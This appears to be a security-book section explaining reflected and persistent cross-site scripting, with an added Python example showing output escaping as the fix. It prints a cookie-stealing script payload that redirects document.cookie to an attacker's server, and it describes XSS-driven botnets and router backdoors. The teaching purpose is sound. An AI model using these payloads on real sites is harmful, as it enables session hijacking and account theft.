
7.11 Cross-Site-Scripting

Cross-Site-Scripting, or XSS for short, is an attack that transfers code (mostly Javascript) through the attackable web server to the client in order to, for example, steal session cookies. An XSS attack is possible if the web application allows a user to insert HTML or script code without filtering it properly and outputs it unescaped. This can, for example, be the case in search boxes. An attacker can now search for the statement <script>alert(document.cookie);</script> and, if the application is vulnerable, gets a popup dialog. By preparing the result so that it is not displayed in a popup but redirected to a server under their control, they could steal the cookies: <script>location.href='save_input.cgi?cookies=' + document.cookie;</script>. Let us assume the input for the search query is performed with a GET request, thus the parameters are specified directly in the URL. Then an attacker can send such a crafted URL to a victim and wait for them to click on it. This is called non-persistent XSS. Besides that, of course, there is also a persistent variant. The difference is that the attack code gets saved somewhere, like in the comment function of a blog or forum.

Not only the angle brackets that enclose an HTML tag are dangerous characters, but also characters like the percent sign, which allows the formation of URL-encoded characters. An example is %3C and %3E for < and >.
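To make the two points above concrete (a search term reflected unescaped, and percent-encoded angle brackets that arrive at the handler already decoded), here is an added Python example that is not part of the book; the sample URL and the function names are constructed for illustration.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed sample request: the payload from the section, percent-encoded
# in the GET parameter of a search box.
SAMPLE_URL = "/search?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E"

def query_from_url(url):
    """Extract the 'q' parameter the way a web framework does: by the time
    the handler sees it, %3C and %3E have already become < and >, so filtering
    the raw URL for angle brackets alone would miss this input."""
    params = parse_qs(urlsplit(url).query)
    return params.get("q", [""])[0]

def render_vulnerable(query):
    """Reflect the search term unescaped: non-persistent XSS."""
    return "<p>Results for: " + query + "</p>"

def render_hardened(query):
    """Escape at output time: the browser displays &lt;script&gt; as text
    instead of parsing it as a tag. quote=True also covers attribute contexts."""
    return "<p>Results for: " + html.escape(query, quote=True) + "</p>"

def contains_active_tag(page):
    """Crude demonstration check: is a raw <script> tag still present after rendering?"""
    return "<script" in page.lower()

if __name__ == "__main__":
    q = query_from_url(SAMPLE_URL)
    print("decoded query :", q)
    print("vulnerable    :", render_vulnerable(q), "->", contains_active_tag(render_vulnerable(q)))
    print("hardened      :", render_hardened(q), "->", contains_active_tag(render_hardened(q)))
```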

Over the years more and more clever techniques have been developed to take advantage of XSS vulnerabilities, and today it is standard to build botnets via XSS (for example by using the BeEF framework) or to port-scan the intranet by injecting Javascript code. This can even lead to other systems being compromised, for example through a successful scan for home routers, followed by logging in with default passwords and configuring a backdoor with the help of port forwarding that gives anyone on the internet direct access to your internal computers.

XSS is not as harmless as it seems and not at all a security hole one can neglect, as many IT staff still think.

Your web server can also be used for XSS attacks if you don't disable the HTTP TRACE method.

The author abstains from printing another code sample as it would be identical to the previous one except for the list in inject_chars.

The complete deactivation of Javascript is no longer a real option for preventing XSS attacks, as so many websites rely on Javascript and AJAX and would be unusable without it. Therefore you should install a browser plugin that lets you allow Javascript code selectively. The most common solution for Firefox is the NoScript plugin, which you can find here: Chrome has such a filter built directly into the browser but unfortunately no option to allow Javascript only temporarily.
